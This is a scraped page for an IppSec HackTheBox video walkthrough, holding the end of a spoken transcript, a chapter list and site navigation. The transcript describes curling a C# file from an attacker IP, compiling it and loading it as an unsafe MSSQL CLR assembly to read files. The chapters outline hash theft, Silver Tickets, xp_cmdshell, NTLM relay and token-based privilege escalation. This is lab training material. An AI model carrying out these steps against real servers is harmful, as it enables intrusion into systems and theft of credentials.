is not here. So we get this was the command I was copying from wrong. I copied this from history. I feel like I'm taking crazy pills. Um echo-n. Sweet. It's in my history still. I think my terminal glitched and I've been having the wrong B 64 the entire time because that is different B 64. I think that was my problem earlier. I have no idea what just went on, but that's a time for another day. So, let's see. Why am I getting this? Oh, because I want to be able to compile this. Um, we could just do this on a Windows box that I have, but I don't have Windows running right now. So, it's easier if I just go on this box and do it. So, what I'm doing here is getting the path to where CSC exists. This should exist on any box that has net installed. And I'm just going to go to program data. And then we can uh download read. So we'll do curl http 10 10148 8000 read.cs. Call it read.cs there. Uh we should have that file. I'm just going to make dirt temp real quick and we'll go in here because all those files in program data are confusing me. So there we go. We just have that file. We can call cse.exe target library and then C colon program data tmp read.cs. And now we have readdll. So let's go back and let's see. We just import it. So I'm going to use this. My SQL shell is going slow. Let's just restart it. There we go. Run that. Let's enable the CLR. And now we want to create assembly from program data temp read.dll is where it is. And we need to do with permission set unsafe. There we go. And let's see. Copy this. And this is going to fail because I don't have the cmd exec on it. Uh what did I call that function? It's probably read. Let's see. Read file. Okay. Um, I should just call this. There we go. So, this is creating the procedure read file. And if I call this, I should be able to read files on the box. So, let's do C colon users MSSQL SVC desktop user.ext. Um, incorrect syntax. Do I do it in quotes? There we go. So, see, I can read a file. So, now my thought was, let's try getting the administrator file. So, administrator desktop root.ext and we can't. Permission is denied. So, even as the CLR, it's still using that downgraded permission. And I don't know a way around that. The only way I found to um fix all the permissions is using this trick that I just showed the name pipe stealing the token then um abusing semersonate to get back to administrator. So that is going to be the box. Hope you enjoyed this whole like garbly of things. There's a lot of good Microsoft SQL pen testing stuff here. So um it's probably a good box to study. Take care all and I will see you all next
Original Description
00:00 - Introduction
01:00 - Start of nmap
02:05 - Logging into the SQL Database with the provided credentials, going over basic enumeration
04:00 - Using XP_DIRTREE to have the SQL Server make a request, sending it to ourself and stealing/cracking the hash
08:50 - Showing RID Brute Forcing with MSSQL to enumerate additional users
10:50 - Explaining how the SUSER_SID command performs a SID Bruteforce, converting the SID from binary to String notation
15:00 - Creating a Silver Ticket with Ticketer.py
23:30 - Impersonating an admin, so we can enable xp_cmdshell to get a shell on the box
27:20 - Showing CVE-2025-33073 posts, which explains the attack we will do with NTLM Relay and cred marshalling
28:30 - Getting Chisel up and running so we can add DNS Names
31:20 - Adding a special DNS Name so we can impersonate DC01, then starting NTLMRelay and forwarding connections to WinRM
37:00 - Using NetExec's coerce_plus to force a request to be made to our special DNS Name and getting a shell
42:30 - Showing if we impersonated the SQL Service itself we could abuse OpenRowSet to read files as administrator and just read root.txt from an SQL Shell
47:10 - Reading the powershell history which would get us the administrator password
54:10 - Showing yet another cool thing, we can abuse how tokens work to get the original token of our the service account which would allow us to have SEImpersonate,then we can use a potato to privesc
1:12:10 - Not every attempt is successful showing adding custom functions via CLR wouldn't give us administrative privileges
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: Network Security
View skill →Related AI Lessons
⚡
⚡
⚡
⚡
Web Scraping with Python in 2026: Best Libraries and Anti-Bot Strategies
Dev.to · Etrit Neziri
Python for Data Science — Probability Basics for Data Science
Medium · Data Science
Python for Data Science — Probability Basics for Data Science
Medium · Python
The Survivorship Bias in Your Funnel Data: Why Drop-Off Analysis Misses the Point
Medium · Data Science
Chapters (16)
Introduction
1:00
Start of nmap
2:05
Logging into the SQL Database with the provided credentials, going over basic
4:00
Using XP_DIRTREE to have the SQL Server make a request, sending it to ourself
8:50
Showing RID Brute Forcing with MSSQL to enumerate additional users
10:50
Explaining how the SUSER_SID command performs a SID Bruteforce, converting the
15:00
Creating a Silver Ticket with Ticketer.py
23:30
Impersonating an admin, so we can enable xp_cmdshell to get a shell on the box
27:20
Showing CVE-2025-33073 posts, which explains the attack we will do with NTLM R
28:30
Getting Chisel up and running so we can add DNS Names
31:20
Adding a special DNS Name so we can impersonate DC01, then starting NTLMRelay
37:00
Using NetExec's coerce_plus to force a request to be made to our special DNS N
42:30
Showing if we impersonated the SQL Service itself we could abuse OpenRowSet to
47:10
Reading the powershell history which would get us the administrator password
54:10
Showing yet another cool thing, we can abuse how tokens work to get the origin
1:12:10
Not every attempt is successful showing adding custom functions via CLR wouldn
🎓
Tutor Explanation
DeepCamp AI